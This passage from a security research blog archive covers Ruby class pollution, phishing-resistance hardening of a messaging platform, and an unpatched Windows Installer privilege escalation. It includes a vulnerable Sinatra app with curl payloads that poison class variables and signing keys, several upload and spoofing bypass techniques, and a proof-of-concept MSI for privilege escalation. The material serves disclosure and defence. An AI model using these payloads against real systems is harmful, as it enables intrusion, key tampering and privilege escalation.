For example, the JSON payload {"_": "Admin"} injects the string “Admin” into the temporary Mash object created by _, allowing the user to be granted admin access through the authorize method even though the to_s method itself hasn’t been directly overridden.

This vulnerability highlights how certain features of the Hashie library can be leveraged to bypass application logic, even with protections in place to prevent method overrides.

Escaping the Object to Poison the Class

When the merge operation is recursive and targets attributes, it’s possible to escape the object context and poison attributes or methods of the class, its parent class, or even other unrelated classes. This kind of pollution affects the entire application context and can lead to severe vulnerabilities.

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
  @@url = "http://default-url.com"

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  def self.url
    @@url
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  private

  # Recursive merge to modify instance variables
  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end
end

class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end
end

# A class created to simulate signing with a key, to be infected with the second gadget
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end

  def sign(signing_key, data)
    "#{data}-signed-with-#{signing_key}"
  end
end

class JSONMergerApp < Sinatra::Base
  # POST /merge - Infects class variables using JSON input
  post '/merge' do
    content_type :json
    json_input = JSON.parse(request.body.read)

    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )

    user.merge_with(json_input)

    { status: 'merged' }.to_json
  end

  # GET /launch-curl-command - Activates the first gadget
  get '/launch-curl-command' do
    content_type :json

    # This gadget makes an HTTP request to the URL exposed by the Person class
    if Person.respond_to?(:url)
      url = Person.url
      response = Net::HTTP.get_response(URI(url))
      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
    else
      { status: 'Failed to access URL variable' }.to_json
    end
  end

  # Curl command to infect User class URL:
  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
  get '/sign_with_subclass_key' do
    content_type :json

    # This gadget signs data using the signing key stored in KeySigner class
    signer = KeySigner.new
    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
  end

  # Curl command to infect KeySigner signing key (run in a loop until successful):
  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

  # GET /check-infected-vars - Check if all variables have been infected
  get '/check-infected-vars' do
    content_type :json

    {
      user_url: Person.url,
      signing_key: KeySigner.signing_key
    }.to_json
  end

  run! if app_file == $0
end

In the example above, we demonstrate two distinct types of class pollution:

(A) Poisoning the Parent Class: By recursively merging attributes, we can modify variables in the parent class. This modification impacts all instances of that class and can lead to unintended behavior across the application.
(B) Poisoning Other Classes: By brute-forcing subclass selection, we can eventually target and poison specific classes. This approach involves repeatedly attempting to poison random subclasses until the desired one is infected. While effective, this method can cause issues due to the randomness and potential for over-infection.

Detailed Explanation of Both Exploits

(A) Poisoning the Parent Class

In this exploit, we use a recursive merge operation to modify the @@url variable in the Person class, which is the parent class of User. By injecting a malicious URL into this variable, we can manipulate subsequent HTTP requests made by the application.

For example, using the following curl command:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

We successfully poison the @@url variable in the Person class. When the /launch-curl-command endpoint is accessed, it now sends a request to http://malicious.com instead of the original URL.

This demonstrates how recursive merges can escape the object level and modify class-level variables, affecting the entire application.
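The escape from the object to its parent class can be reproduced without the HTTP server. The sketch below is a condensed version of the merge shown earlier, under the assumption that a single top-level helper is enough for illustration. It drops the Object.new branch of the original and keeps only the traversal and assignment steps.

```ruby
require 'json'

class Person
  @@url = "http://default-url.com"

  def self.url
    @@url
  end
end

class User < Person; end

# Condensed, hypothetical variant of the article's recursive_merge.
def recursive_merge(current_obj, additional)
  additional.each do |key, value|
    if value.is_a?(Hash) && current_obj.respond_to?(key)
      # Follow the attacker-chosen method: user -> class -> superclass.
      recursive_merge(current_obj.public_send(key), value)
    else
      current_obj.instance_variable_set("@#{key}", value)
      current_obj.singleton_class.attr_accessor key
    end
  end
end

payload = JSON.parse('{"class":{"superclass":{"url":"http://example.com"}}}')
recursive_merge(User.new, payload)

poisoned_url = Person.url
class_variable = Person.class_variable_get(:@@url)
```

In this sketch, Person.url returns the injected value for every caller. The mechanism is worth noting: the merge stores the value in a class-level instance variable and redefines the Person.url accessor, so the gadget reading Person.url is affected even though the @@url class variable itself still holds the default.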

(B) Poisoning Other Classes

This exploit leverages brute-force to infect specific subclasses. By repeatedly attempting to inject malicious data into random subclasses, we can eventually target and poison the KeySigner class, which is responsible for signing data.

For example, using the following looped curl command:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

We attempt to poison the @@signing_key variable in KeySigner. After several attempts, the KeySigner class is infected, and the signing key is replaced with our injected key.

This exploit highlights the dangers of recursive merges combined with brute-force subclass selection. While effective, this method can cause issues due to its aggressive nature, potentially leading to the over-infection of classes.
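The brute-force step can be sketched outside the server as well. This assumes Ruby 3.1 or later, where Class#subclasses is available, and reuses a condensed, hypothetical variant of the merge. The attempt cap and the FrozenError rescue are additions for the sketch, not part of the original code.

```ruby
class Person; end
class User < Person; end

class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end
end

# Condensed, hypothetical variant of the article's recursive_merge.
def recursive_merge(current_obj, additional)
  additional.each do |key, value|
    if value.is_a?(Hash) && current_obj.respond_to?(key)
      recursive_merge(current_obj.public_send(key), value)
    else
      current_obj.instance_variable_set("@#{key}", value)
      current_obj.singleton_class.attr_accessor key
    end
  end
end

# user -> User -> Person -> Object -> Object.subclasses -> random class
payload = {
  "class" => { "superclass" => { "superclass" => { "subclasses" => {
    "sample" => { "signing_key" => "injected-signing-key" }
  } } } }
}

attempts = 0
until KeySigner.signing_key == "injected-signing-key" || attempts >= 100_000
  begin
    recursive_merge(User.new, payload)
  rescue FrozenError
    # A frozen target cannot be modified; try another random class.
  end
  attempts += 1
end
```

Each attempt poisons whichever class Array#sample happens to return, which is why the curl command runs in a loop and why many unrelated classes end up carrying a signing_key accessor by the time KeySigner is hit.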

In the latter examples, we set up an HTTP server to demonstrate how the infected classes remain poisoned across multiple HTTP requests. The persistent nature of these infections shows that once a class is poisoned, the entire application context is compromised, and all future operations involving that class will behave unpredictably.

The server setup also allowed us to easily check the state of these infected variables via specific endpoints. For example, the /check-infected-vars endpoint outputs the current values of the @@url and @@signing_key variables, confirming whether the infection was successful.

This approach clearly shows how class pollution in Ruby can have lasting and far-reaching consequences, making it a critical area to secure.

Conclusion

The research conducted here highlights the risks associated with class pollution in Ruby, especially when recursive merges are involved. These vulnerabilities are particularly dangerous because they allow attackers to escape the confines of an object and manipulate the broader application context. By understanding these mechanisms and carefully considering how data merges are handled, it is possible to mitigate the risk of class pollution in Ruby applications.

We’re hiring!

We are a small highly focused team. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security. If you’ve enjoyed this research, consider applying via our careers portal to spend up to 11 weeks/year on research projects like this one!

Applying Security Engineering to Make Phishing Harder - A Case Study

2024-09-19T00:00:00+02:00

Introduction

Recently Doyensec was hired by a client offering a “Communication Platform as a Service”. This platform allows their clients to craft a customer service experience and to communicate with their own customers via a plethora of channels: email, web chats, social media and more.

While undoubtedly valuable, such a service introduces a unique threat model. Our client’s users work with a vast amount of incoming correspondence from outside (often anonymous) users, on a daily basis. This makes them particularly vulnerable to phishing and other social engineering attacks.

While such threats cannot be fully eliminated, it is possible to minimize the possibilities for exploitation. Recognizing this, Doyensec was hired to perform a security review, specifically focused on social engineering attacks and phishing in particular. The engagement, performed earlier this year, has proven to be extremely valuable for both parties. Most importantly, our client used the results to greatly increase their platform’s resilience against social engineering attacks. Additionally, Doyensec engineers had a great opportunity to unleash their creativity on bugs that are often overlooked, or at least heavily undervalued (looking at you, CVSS score!), during standard security audits, as well as the opportunity to look at defending the application from a blue-team perspective.

The following case study will discuss some of the vulnerabilities that were addressed as part of this audit. Hopefully, this post will be useful for developers to understand what kind of vulnerabilities can be lurking in their platforms too. It also helps to demonstrate how valuable such focused engagements can be as an addition to standard web engagements.

Attachments Handling

For any customer support organization, file attachment management is a crucial feature. On one hand, it is crucial for users to be able to share file samples, screenshots, etc. with their interlocutors. On the other hand, sharing files is always a hotbed for exploiting all manner of security bugs, especially when accepting files from untrusted parties. Therefore, hardening this part of the application will always require careful considerations as to how to ensure confidentiality and integrity without sacrificing usability.

File Extension Restriction Bypass via Trailing Period

The tested platform employs a robust system designed to validate allowed file extensions and content types for file uploads, featuring a global ban list for inherently dangerous file types, such as executables (e.g., .exe). These measures are intended to prevent the uploading and distribution of potentially malicious files. However, by exploiting some browsers’ quirks, a vulnerability was discovered that allowed users to bypass these restrictions simply by appending a trailing period (“dangling dot”) to the file extension.

It was possible to bypass this file extension restriction by crafting an upload request with a prohibited extension followed by a dot, such as ".exe.". The system accepted the file, since it ostensibly met the criteria for allowed uploads, which included an empty extension. However, Firefox and Chromium-based browsers remove the dangling dot (interestingly, Safari retains it). As a result, the file was saved with the original .exe extension on the victim’s filesystem.

The recommendation is simple here. Trailing dots should be removed from filenames. They rarely have any use in real-world scenarios, therefore the usability tradeoff is minimal.
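As a rough illustration of that recommendation, the sketch below normalizes a filename before the extension check runs. The ban list and all helper names are hypothetical; the platform's actual validation code is not shown in this post.

```ruby
# Hypothetical ban list; the platform's real list is not given in the article.
BLOCKED_EXTENSIONS = %w[exe bat cmd msi].freeze

# Strip trailing dots and whitespace before any extension check.
def normalize_filename(name)
  name.sub(/[.\s]+\z/, "")
end

# Return the lowercase extension of the normalized name, or "" if there is none.
def extension_of(name)
  clean = normalize_filename(name)
  dot = clean.rindex(".")
  dot ? clean[(dot + 1)..-1].downcase : ""
end

def blocked_upload?(name)
  BLOCKED_EXTENSIONS.include?(extension_of(name))
end
```

With this ordering, "payload.exe." is checked as "payload.exe" and rejected, instead of being treated as a file with an empty extension.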

Circumvention of Content Origin Restrictions via Subdomain Crafting

Platform chats have been created with a restriction, which allows link attachments from our client’s subdomains only. This security control is designed to restrict uploads and references to images and attachments to a predefined set of origins, preventing the use of external sources that could be employed in phishing attacks. The intended validation process relies on an allowlist of domains.

However, when validating (sub)domains using regular expressions, it’s easy to forget the intricacies of this syntax, which can lead to hard-to-spot bypasses.

Doyensec observed that subdomains were matched using an allowlist of regular expressions similar to /acme-attachments-1.com/. Such a regular expression does not enforce the beginning and the end of the string and will therefore accept any domains that contain the desired subdomain. An attacker could create a subdomain similar to acme-attachments-1.com.doyensec.com, which would be accepted despite this security mechanism.

Another common (although not exploitable in this case) mistake is forgetting that the dot (.) character is treated as a wildcard by regular expressions. When one forgets to escape a dot in a domain regex, an attacker can register a domain which will bypass such a restriction. For instance, a regular expression similar to downloads.acmecdn.com would accept an attacker-controlled domain like downloadsAacmecdn.com.
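Both mistakes are easy to reproduce. The following Ruby sketch uses the example domains from the text. The constant and method names are assumptions made for illustration, and the platform's real allowlist is not shown here.

```ruby
# Unanchored and unescaped, similar to the pattern observed during the audit.
LOOSE_PATTERN = /acme-attachments-1.com/

# Anchored to the whole string, with literal dots.
STRICT_PATTERN = /\Aacme-attachments-1\.com\z/

def allowed_host?(host, pattern)
  host.match?(pattern)
end

attacker_host = "acme-attachments-1.com.doyensec.com"

loose_result = allowed_host?(attacker_host, LOOSE_PATTERN)
strict_result = allowed_host?(attacker_host, STRICT_PATTERN)

# The unescaped dot matches any character, including "A".
wildcard_result = "downloadsAacmecdn.com".match?(/\Adownloads.acmecdn.com\z/)

# Regexp.escape turns a plain hostname into a safe literal pattern.
escaped_pattern = /\A#{Regexp.escape("downloads.acmecdn.com")}\z/
escaped_result = "downloadsAacmecdn.com".match?(escaped_pattern)
```

Note that in Ruby, ^ and $ match at line boundaries rather than at the start and end of the string, so \A and \z are the anchors to use for this kind of validation.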

It is worth noting that as innocuous as this vulnerability seems to be, it actually has great potential for creating successful phishing attacks. When a victim receives an attachment in a trusted platform, they’re far more likely to follow the link. Also, a login page would not be surprising for a victim, further increasing the likelihood of them giving away their credentials.

Antivirus Scan Bypass

The platform appropriately implements antivirus scanning on all incoming files. However, an attacker could obfuscate the true content of the payload by creating an encrypted archive: $ zip -e test_encrypted.zip eicar.com.

There is no simple solution to solve this issue. Banning encrypted archives altogether is a usability trade-off that might be unacceptable in some cases. Doyensec recommended clearly warning users against opening encrypted files at the very least. It might be also useful to allow the clients to choose which side of this trade-off is acceptable for them by creating a proper configuration switch.
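One way such a configuration switch could decide when to warn or reject is to look at the ZIP format itself: bit 0 of the general purpose flag in a local file header marks an encrypted entry. The sketch below checks only the first header of a byte string, and the method name is hypothetical. A real implementation would need to walk every entry and handle other archive formats.

```ruby
ZIP_LOCAL_HEADER_SIGNATURE = 0x04034b50

# Returns true when the first local file header has the encryption bit set.
def first_zip_entry_encrypted?(bytes)
  # Signature (4 bytes), version needed (2 bytes), general purpose flag (2 bytes),
  # all little-endian.
  signature, _version, flags = bytes.unpack("Vvv")
  signature == ZIP_LOCAL_HEADER_SIGNATURE && (flags & 0x0001) == 1
end

# Hand-built header prefixes used only to exercise the check.
encrypted_header = [ZIP_LOCAL_HEADER_SIGNATURE, 20, 0x0001].pack("Vvv")
plain_header = [ZIP_LOCAL_HEADER_SIGNATURE, 20, 0x0000].pack("Vvv")
```

A platform could use a check along these lines to show the warning only for archives the scanner was unable to inspect.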

HTML Input Handling

When it comes to exchanging messages, it can be very useful to add formatting and give users more ways of expressing themselves. On the other hand, when messages are coming from untrusted sources, such a feature can enable attackers to craft sophisticated attacks that involve UI redressing, e.g., emulating UI elements within their messages.

Our client has found a great way to balance usability and security. While trusted users have a rich choice of input formatting options, untrusted users from outside the platform can only share basic plain-text messages. It is also worth noting that even trusted users can’t inject arbitrary HTML into their messages, given that HTML tags are properly parsed and encoded. There are, however, specific tags that are allowed and, in some cases, converted into more elaborate elements (e.g., link tags get converted into buttons).

Doyensec found this solution well-architected at the design level. However, due to an oversight in the implementation, the public messaging API also accepted a “hidden” (not used by the frontend) parameter which allowed some HTML elements. Doyensec was able to exploit the conversion of links into buttons to demonstrate the potential for UI elements to be spoofed using this vulnerability.

The issue was resolved by completely disabling this parameter in the public API, only allowing authenticated users to format their messages.

Links Presentation Bugs

Data presentation bugs are an especially overlooked threat. Despite their potential to manipulate or distort critical information, they are frequently underestimated in security assessments and deprioritized during remediation. However, their exploitation can lead to serious consequences, including phishing.

Misleading Unicode Domain Rendering

To understand this issue, it is important to understand two terms. The first is Punycode, a character encoding scheme used to represent Unicode characters in domain names. It enables browsers and other web clients to handle Unicode in domain names. The second is homoglyphs: characters that look very similar to each other but have different code points. For example, the characters ‘a’ (code: 0x61) and ‘а’ (code: 0x430) are visually indistinguishable, yet they are two different characters that lead to two different domains when used in a URL.

One of the most prominent examples of this threat was created by the researcher Xudong Zheng. This researcher created a link that looks deceivingly similar to the widely trusted www.apple.com domain. However, the link https://www.аррӏе.com actually resolves to www.xn--80ak6aa92e.com once the Unicode label is converted to its Punycode form. Visiting the link reveals that it is not controlled by Apple, despite its convincing appearance.

To protect users from these types of issues, we recommended rendering Unicode domains in Punycode format. This way users are not deceived in regards to where the given link leads.
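A rendering layer first has to notice that a hostname is not plain ASCII. The sketch below shows one simple way to do that in Ruby. The method name is hypothetical, and the actual conversion to Punycode is left out because it needs an IDNA library that this post does not specify.

```ruby
# Latin "a" and Cyrillic "а" look alike but are different code points.
latin_a = "a"
cyrillic_a = "\u0430"

genuine_host = "www.apple.com"
# Cyrillic letters spelling a lookalike of "apple", as in the example above.
spoofed_host = "www.\u0430\u0440\u0440\u04CF\u0435.com"

# Hosts with any non-ASCII character are candidates for Punycode rendering.
def needs_punycode_rendering?(host)
  !host.ascii_only?
end

contains_cyrillic = spoofed_host.match?(/\p{Cyrillic}/)
```

Any host flagged this way would then be displayed in its xn-- form instead of the Unicode form, so the user sees where the link really leads.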

URI and Filename Spoofing via RTLO Injection

Using the Right-To-Left Override (RTLO) character is another technique for manipulating the way links are displayed. The RTLO character changes the order in which consecutive characters are rendered. When it comes to filenames and URLs, their structures are fixed and the character order matters. Therefore, flipping the character order is an effective way of obscuring the true target of the link, or the extension of a file.

Sounds complicated? An example will clear it up. Consider a link to an attacker-controlled domain: https://gepj.net/selif#/moc.rugmi. Written like this, it looks suspicious. However, when prepended with the RTLO Unicode character ([U+202E]https://gepj.net/selif#/moc.rugmi), the characters are rendered in reverse order, so the link reads as imgur.com/#files/ten.jpeg//:sptth.

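Displayed file extensions can be manipulated in a similar manner.

Consider a file named test.[U+202E]fdp.zip. Everything after the override character is rendered in reverse, so the name is displayed as test.piz.pdf while the real extension remains .zip.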

The proposed solution here is simple - stricter filtering. URLs should not be rendered as links when the character order is changed. Similarly, filenames containing character flow manipulators should be rejected.
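A filter along these lines can be sketched in a few lines of Ruby. The character set below covers the Unicode bidirectional control characters. The constant and method names are assumptions for illustration, not the platform's implementation.

```ruby
# LRM, RLM, the embedding/override controls (U+202A..U+202E)
# and the isolate controls (U+2066..U+2069).
BIDI_CONTROLS = /[\u200E\u200F\u202A-\u202E\u2066-\u2069]/

# True when the text contains a character that alters rendering direction.
def contains_bidi_control?(text)
  text.match?(BIDI_CONTROLS)
end

spoofed_filename = "test.\u202Efdp.zip"
spoofed_url = "\u202Ehttps://gepj.net/selif#/moc.rugmi"
```

Filenames for which contains_bidi_control? returns true would be rejected at upload, and URLs containing such characters would be shown as plain text rather than as clickable links.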

Even when links are always properly displayed, there still remains a chance that an attacker can create a successful phishing campaign. After all, users could always get coerced into following a malicious link. Such a risk cannot be fully eliminated, but it can be mitigated with additional hardening. The examined platform implements navigation confirmation interstitials. This means that any time a user follows a link outside of the platform, an additional confirmation screen will appear. Such UI elements inform the user that they’re leaving a safe environment. This UX design greatly decreases the chances of a successful phishing attack.

Summary

This project is a great example of a proactive engagement against specific threats. Given the particular threat model of this platform, such an engagement has proven extremely useful as an addition to regular security assessments and their bug bounty program. In particular, an engagement specifically focused on phishing and social engineering allowed us to craft a list of recommendations and hardening ideas that would have otherwise just been a side note in a regular security review.

Windows Installer, Exploiting Custom Actions

2024-07-18T00:00:00+02:00

Over a year ago, I published my research around the Windows Installer Service. The article explained in detail how the MSI repair process executes in an elevated context, but the lack of impersonation could lead to Arbitrary File Delete and similar issues. The issue was acknowledged by Microsoft (as CVE-2023-21800), but it was never directly fixed. Instead, the introduction of a Redirection Guard mitigated all symlink attacks in the context of the msiexec process. Back then, I wasn’t particularly happy with the solution, but I couldn’t find any bypass.

The Redirection Guard turned out to work exactly as intended, so I spent some time attacking the Windows Installer Service from other angles. Some bugs were found (CVE-2023-32016), but I always felt that the way Microsoft handled the impersonation issue wasn’t exactly right. That unfixed behavior became very useful during another round of research.

This article describes an unpatched vulnerability affecting the latest Windows 11 versions. It illustrates how the issue can be leveraged to elevate a local user’s privileges. The bug submission was closed as non-reproducible after half a year of processing. I will demonstrate how the issue can be reproduced by anyone else.

Custom Actions

Custom Actions in the Windows Installer world are user-defined actions that extend the functionality of the installation process. Custom Actions are necessary in scenarios where the built-in capabilities of Windows Installer are insufficient. For example, if an application requires specific registry keys to be set dynamically based on the user’s environment, a Custom Action can be used to achieve this. Another common use case is when an installer needs to perform complex tasks like custom validations or interactions with other software components that cannot be handled by standard MSI actions alone.

Overall, Custom Actions can be implemented in different ways, such as:

Compiled to custom DLLs using the exposed C/C++ API
Inline VBScript or JScript snippets within the WSX file
Explicitly calling system commands within the WSX file

All of the above methods are affected, but for simplicity, we will focus on the last type.

Let’s take a look at an example WSX file (poc.wsx) containing some Custom Actions:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product Id="{12345678-9259-4E29-91EA-8F8646930000}" Language="1033" Manufacturer="YourCompany" Name="HelloInstaller" UpgradeCode="{12345678-9259-4E29-91EA-8F8646930001}" Version="1.0.0.0">
        <Package Comments="This installer database contains the logic and data required to install HelloInstaller." Compressed="yes" Description="HelloInstaller" InstallerVersion="200" Languages="1033" Manufacturer="YourCompany" Platform="x86" ReadOnly="no" />

        <CustomAction Id="SetRunCommand" Property="RunCommand" Value="&quot;[%USERPROFILE]\test.exe&quot;" Execute="immediate" />
        <CustomAction Id="RunCommand" BinaryKey="WixCA" DllEntry="WixQuietExec64" Execute="commit" Return="ignore" Impersonate="no" />
        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="ProgramFilesFolder">
                <Directory Id="INSTALLFOLDER" Name="HelloInstaller" ShortName="krp6fjyg">
                    <Component Id="ApplicationShortcut" Guid="{12345678-9259-4E29-91EA-8F8646930002}" KeyPath="yes">
                        <CreateFolder Directory="INSTALLFOLDER" />
                    </Component>
                </Directory>
            </Directory>
        </Directory>
        <Property Id="ALLUSERS" Value="1" />
        <Feature Id="ProductFeature" Level="1" Title="Main Feature">
            <ComponentRef Id="ApplicationShortcut" />
        </Feature>
        <MajorUpgrade DowngradeErrorMessage="A newer version of [ProductName] is already installed." Schedule="afterInstallValidate" />

        <InstallExecuteSequence>
            <Custom Action="SetRunCommand" After="InstallInitialize">1</Custom>
            <Custom Action="RunCommand" After="SetRunCommand">1</Custom>
        </InstallExecuteSequence>
    </Product>
</Wix>

This looks like a perfectly fine WXS file. It defines the InstallExecuteSequence, which consists of two custom actions. The SetRunCommand is queued to run right after the InstallInitialize event. Then, the RunCommand should start right after SetRunCommand finishes.

The SetRunCommand action simply sets the value of the RunCommand property. The [%USERPROFILE] string will be expanded to the path of the current user’s profile directory. This is achieved by the installer using the value of the USERPROFILE environment variable. The expansion process involves retrieving the environment variable’s value at runtime and substituting [%USERPROFILE] with this value.

The second action, also called RunCommand, uses the RunCommand property and executes it by calling the WixQuietExec64 method, which is a great way to execute the command quietly and securely (without spawning any visible windows). The Impersonate="no" option enables the command to execute with LocalSystem’s full permissions.

On a healthy system, the administrator’s USERPROFILE directory cannot be accessed by any less privileged users. Whatever file is executed by the RunCommand shouldn’t be directly controllable by unprivileged users.

We covered a rather simple example. Implementing the intended Custom Action is actually quite complicated. There are many mistakes that can be made. The actions may rely on untrusted resources, they can spawn hijackable console instances, or run with more privileges than necessary. These dangerous mistakes may be covered in future blogposts.

Testing the Installer

Having the WiX Toolset at hand, we can turn our XML into an MSI file. Note that we need to enable the additional WixUtilExtension to use the WixCA:

candle .\poc.wxs 
light .\poc.wixobj -ext WixUtilExtension.dll

The poc.msi file should be created in the current directory.

According to our WXS file above, once the installation is initialized, our Custom Action should run the "[%USERPROFILE]\test.exe" file. We can set up a ProcMon filter to look for that event. Remember to also enable the “Integrity” column.

We can install the application using any Admin account (the Almighty user here):

msiexec /i C:\path\to\poc.msi

ProcMon should record the CreateFile event. The file was not there, so additional file extensions were tried.

The same sequence of actions can be reproduced by running an installation repair process. The command can point at the specific C:/Windows/Installer/*.msi file or use the GUID that we defined in the WXS file:

msiexec /fa {12345678-9259-4E29-91EA-8F8646930000}

The result should be exactly the same if the Almighty user triggered the repair process.

On the other hand, note what happens if the installation repair was started by another unprivileged user: lowpriv.

It is the user’s environment that sets the executable path, but the command still executes with System level integrity, without any user impersonation! This leads to a straightforward privilege escalation.
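To make the effect concrete, here is a minimal Go sketch of the substitution step. It is only an illustration of the idea, not how Windows Installer is implemented: the expandEnvRefs helper is hypothetical, and the C:\Users\Almighty profile path is an assumption (the lowpriv path matches the one seen in the installer log).

```go
package main

import (
	"fmt"
	"regexp"
)

// envRef matches installer-style environment references such as [%USERPROFILE].
var envRef = regexp.MustCompile(`\[%([A-Za-z_][A-Za-z0-9_]*)\]`)

// expandEnvRefs is a hypothetical helper: it replaces every [%NAME] in s
// with env[NAME]. Unknown names expand to an empty string in this sketch.
func expandEnvRefs(s string, env map[string]string) string {
	return envRef.ReplaceAllStringFunc(s, func(m string) string {
		name := envRef.FindStringSubmatch(m)[1]
		return env[name]
	})
}

func main() {
	value := `"[%USERPROFILE]\test.exe"`

	// Assumed environments of the two users starting the repair.
	admin := map[string]string{"USERPROFILE": `C:\Users\Almighty`}
	lowpriv := map[string]string{"USERPROFILE": `C:\Users\lowpriv`}

	// The same property value resolves to a different executable,
	// depending on whose environment is used for the expansion.
	fmt.Println(expandEnvRefs(value, admin))
	fmt.Println(expandEnvRefs(value, lowpriv))
}
```

The property definition never changes; only the environment of whoever starts the repair does, and that is enough to redirect the elevated command.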

As a final confirmation, the lowpriv user would plant an add-me-as-admin type of payload under the C:/Users/lowpriv/test.exe path. The installation process will not finish while test.exe is still running, though handling that behavior is rather trivial.

Optionally, add /L*V log.txt to the repair command for a detailed log. The poisoned properties should be evident:

MSI (s) (98:B4) [02:01:33:733]: Machine policy value 'AlwaysInstallElevated' is 0
MSI (s) (98:B4) [02:01:33:733]: User policy value 'AlwaysInstallElevated' is 0
...
Action start 2:01:33: InstallInitialize.
MSI (s) (98:B4) [02:01:33:739]: Doing action: SetRunCommand
MSI (s) (98:B4) [02:01:33:739]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: InstallInitialize. Return value 1.
MSI (s) (98:B4) [02:01:33:740]: PROPERTY CHANGE: Adding RunCommand property. Its value is '"C:\Users\lowpriv\test.exe"'.
Action start 2:01:33: SetRunCommand.
MSI (s) (98:B4) [02:01:33:740]: Doing action: RunCommand
MSI (s) (98:B4) [02:01:33:740]: Note: 1: 2205 2:  3: ActionText
Action ended 2:01:33: SetRunCommand. Return value 1.

The Poisoned Variables

The repair operation in msiexec.exe can be initiated by a standard user, while automatically elevating its privileges to execute certain actions, including various custom actions defined in the MSI file. Notably, not all custom actions execute with elevated privileges. Specifically, an action must be explicitly marked as Impersonate="no", be scheduled between the InstallInitialize and InstallFinalize events, and use either commit, rollback or deferred as the execution type to run elevated.

In the future, we may publish additional materials, including a toolset to hunt for affected installers that satisfy the above criteria.

Elevated custom actions may use environment variables as well as Windows Installer properties (see the full list of properties). I’ve observed the following properties can be “poisoned” by a standard user that invokes the repair process:

“AdminToolsFolder”
“AppDataFolder”
“DesktopFolder”
“FavoritesFolder”
“LocalAppDataFolder”
“MyPicturesFolder”
“NetHoodFolder”
“PersonalFolder”
“PrintHoodFolder”
“ProgramMenuFolder”
“RecentFolder”
“SendToFolder”
“StartMenuFolder”
“StartupFolder”
“TempFolder”
“TemplateFolder”

Additionally, the following environment variables are often used by software installers (this list is not exhaustive):

“APPDATA”
“HomePath”
“LOCALAPPDATA”
~~“TEMP”~~
~~“TMP”~~ (Meanwhile, a separate patch introduced the SystemTemp concept and remediated these two variables. Thanks to @pfiatde for pointing it out!)
“USERPROFILE”

These values are typically utilized to construct custom paths or as system command parameters. Poisoned values can alter the command’s intent, potentially leading to a command injection vulnerability.
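When reviewing an installer by hand, a quick first pass is to look for references to these names inside custom action values. The Go sketch below is a hypothetical helper, not part of any released toolset: it assumes the [Property] and [%ENVVAR] reference syntax used in the example above, and it leaves out TEMP and TMP since those two were remediated.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Names taken from the two lists above (TEMP and TMP omitted as remediated).
var poisonableProps = map[string]bool{
	"AdminToolsFolder": true, "AppDataFolder": true, "DesktopFolder": true,
	"FavoritesFolder": true, "LocalAppDataFolder": true, "MyPicturesFolder": true,
	"NetHoodFolder": true, "PersonalFolder": true, "PrintHoodFolder": true,
	"ProgramMenuFolder": true, "RecentFolder": true, "SendToFolder": true,
	"StartMenuFolder": true, "StartupFolder": true, "TempFolder": true,
	"TemplateFolder": true,
}

var poisonableEnv = map[string]bool{
	"APPDATA": true, "HOMEPATH": true, "LOCALAPPDATA": true, "USERPROFILE": true,
}

// ref matches [Name] and [%NAME] references inside a property or command value.
var ref = regexp.MustCompile(`\[(%?)([A-Za-z_][A-Za-z0-9_.]*)\]`)

// poisonableRefs returns the sorted, de-duplicated references in value that
// appear in the lists above. Environment variables are reported with a
// leading '%' and compared case-insensitively.
func poisonableRefs(value string) []string {
	seen := map[string]bool{}
	for _, m := range ref.FindAllStringSubmatch(value, -1) {
		isEnv, name := m[1] == "%", m[2]
		if isEnv && poisonableEnv[strings.ToUpper(name)] {
			seen["%"+strings.ToUpper(name)] = true
		} else if !isEnv && poisonableProps[name] {
			seen[name] = true
		}
	}
	out := make([]string, 0, len(seen))
	for k := range seen {
		out = append(out, k)
	}
	sort.Strings(out)
	return out
}

func main() {
	fmt.Println(poisonableRefs(`"[%USERPROFILE]\test.exe"`))
	fmt.Println(poisonableRefs(`[INSTALLFOLDER]app.exe`))
	fmt.Println(poisonableRefs(`cmd /c del "[TempFolder]cache" "[AppDataFolder]x"`))
}
```

A hit only means the value deserves a closer look; whether it is exploitable still depends on the action running elevated.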

Note that the described issue is not exploitable on its own. The MSI file utilizing a vulnerable Custom Action must be already installed on the machine. However, the issue could be handy to pentesters performing Local Privilege Elevation or as a persistence mechanism.

Disclosure Timeline

